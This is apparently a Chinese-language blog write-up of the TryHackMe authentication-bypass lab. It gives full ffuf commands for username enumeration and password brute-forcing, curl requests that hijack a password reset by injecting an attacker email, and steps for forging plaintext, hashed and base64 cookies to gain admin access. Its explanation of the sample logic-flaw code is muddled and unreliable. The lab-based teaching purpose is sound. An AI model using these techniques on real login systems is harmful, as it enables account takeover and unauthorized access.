当前位置:首页 > 技术 > 正文内容

身份验证绕过机制详解

访客 技术 2026年7月7日 1

本文基于TryHackMe实验平台(房间链接:https://tryhackme.com/room/authenticationbypass)进行学习。核心目标是掌握如何利用登录系统及其他认证机制中的漏洞,从而获取未授权的访问权限。

用户名枚举

在挖掘身份验证漏洞时,收集有效用户名是关键步骤。网站返回的错误信息往往是构建用户名列表的重要来源。

在实验环境中(Acme IT Support网站,地址:http://MACHINE_IP/customers/signup),我们有一个注册表单。尝试使用用户名admin并填写其他假数据后,系统会提示"具有此用户名的帐户已存在"。我们可以利用ffuf工具基于这一错误信息来枚举有效用户名。

user@tryhackme$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

参数说明:

  • -w:指定用户名字典路径;
  • -X:设置请求方法为POST;
  • -d:定义发送的数据,其中FUZZ表示字典内容插入位置;
  • -H:添加HTTP头;
  • -u:目标URL;
  • -mr:匹配页面上包含的错误信息文本。

ffuf和字典已在实验环境的AttackBox中预装,也可以从https://github.com/ffuf/ffuf下载安装。找到的有效用户名应保存到valid_usernames.txt文件中,以供后续使用。

暴力破解登录

利用上一步生成的用户名列表,我们可以对登录页面(http://MACHINE_IP/customers/login)进行暴力破解。注意:如果通过管道生成文件,请确保数据已清理,只保留原始用户名。

暴力破解会结合用户名列表和常用密码字典自动尝试登录。

user@tryhackme$ ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200

此命令与上一节不同:使用自定义关键字W1和W2分别表示用户名和密码字典,并用-fc过滤状态码200的响应(成功登录通常返回302重定向)。

逻辑缺陷利用

什么是逻辑缺陷?逻辑缺陷是指攻击者能绕过或操纵应用程序的正常流程。以下是一个常见示例:

if( url.substr(0,6) === '/admin') {
    # 检查用户是否为管理员
} else {
    # 显示页面
}

上述PHP代码使用===进行严格比较。若用户请求路径为/adMin,将跳过权限验证直接显示页面,从而绕过身份检查。

重置密码功能漏洞:Acme IT Support网站的重置密码页面(http://MACHINE_IP/customers/reset)存在逻辑缺陷。当输入有效邮箱robert@acmeitsupport.thm后,下一阶段要求输入用户名。关键漏洞在于:系统使用$_REQUEST变量同时处理查询字符串和POST数据,且POST数据优先级更高。因此,攻击者可以篡改邮件接收地址。

下面通过curl演示:

# 原始请求,使用%40表示@字符
user@tryhackme$ curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'

# 恶意请求,添加email参数覆盖目标
user@tryhackme$ curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'

利用此漏洞,攻击者可将重置链接发到自己的邮箱。在Acme IT Support注册账户后,会获得{username}@customer.acmeitsupport.thm格式的邮箱。重新运行第二个curl命令,将email字段改为自己的支持邮箱,即可在工单中收到重置链接,从而以Robert身份登录。

Cookie篡改

明文Cookie:某些Cookie内容直接决定权限。例如登录后的Cookie:

Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/

通过curl修改Cookie可提升权限:

# 初始请求,返回"未登录"
user@tryhackme$ curl http://10.10.68.98/cookie-test

# 设置logged_in=true,返回"以用户身份登录"
user@tryhackme$ curl -H "Cookie: logged_in=true; admin=false" http://10.10.68.98/cookie-test

# 同时设置admin=true,返回"以管理员身份登录"
user@tryhackme$ curl -H "Cookie: logged_in=true; admin=true" http://10.10.68.98/cookie-test

Hash值破解:Cookie值可能是不可逆的哈希,但可利用在线数据库(如https://crackstation.net)反向查找。例如,常见哈希算法对同一输入产生固定输出。

编码解析:编码是可逆的,例如base64。假设Cookie值为eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==,解码后为{"id":1,"admin": false}。将其修改为{"id":1,"admin": true}并重新编码,即可获得管理员权限。

相关文章

Linux crontab 详解

1) crontab 是什么cron 是 Linux 的定时任务守护进程;crontab 是用来编辑/查看“按时间周期执行命令”的表(cron table)。常见两类:用户 crontab:每个用户一份(crontab -e 编辑)系统级 crontab / cron.d:可指定执行用户(/etc/crontab、/etc/cron.d/*)2) crontab 时间...

富文本里可以允许的 HTML 属性

一、所有标签默认允许的安全属性(极少)class        (可选)id           (通常建议禁用)title️ 注意:id 容易被滥用做锚点注入,很多系统直接禁用class 允许的话最好只允许固定前缀(如 editor-*)二、a 标签允许属性<a href="" t...

Mac 安装 Node.js 指南

方法一:通过官网安装包(最简单,适合初学者)如果你只是想快速安装并开始使用,这是最直接的方法。访问 Node.js 官网。页面会显示两个版本:LTS (Recommended For Most Users):长期支持版,最稳定。建议选这个。Current:最新特性版,包含最新功能但可能不够稳定。下载 .pkg 安装包并运行。按照安装向导点击“下一步”即可完成。方法二:使用 Homebrew 安装(...

Dom\HTML_NO_DEFAULT_NS 的副作用:自动加闭合标签

在使用Dom\HTMLDocument时,Dom\HTML_NO_DEFAULT_NS 将禁止在解析过程中设置元素的命名空间, 此设置是为了与DOMDocument向后兼容而存在的。当使用它时,已知的一个副作用就是:自动加闭合标签例如 </img> 为什么会这样?当你使用:Dom\HTML_NO_DEFAULT_NS文档会变成 无命名空间模式,此时内部更接近 XML...

Laravel 事件和监听器创建

在 Laravel 中,使用 Artisan 命令创建 Events(事件) 和 Listeners(监听器) 是非常高效的。你可以通过以下几种方式来实现:1. 手动创建单个 Event如果你只想创建一个事件类,可以使用 make:event 命令:Bashphp artisan make:event UserRegistered执行后,文件将生成在 app/Even...

自定义域名解析神器 dnsmasq

什么是 dnsmasq?dnsmasq 是一个轻量级、功能强大的网络服务工具,专为小型和中等规模网络设计。它是一个综合的网络基础设施解决方案[1]。dnsmasq 能做什么?功能说明应用场景DNS 转发与缓存将 DNS 查询转发到上游服务器(ISP、Google DNS 等),并在本地缓存结果加快 DNS 查询速度,减少外部 DNS 流量本地 DNS解析本地网络设备的主机名,无需编辑&n...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。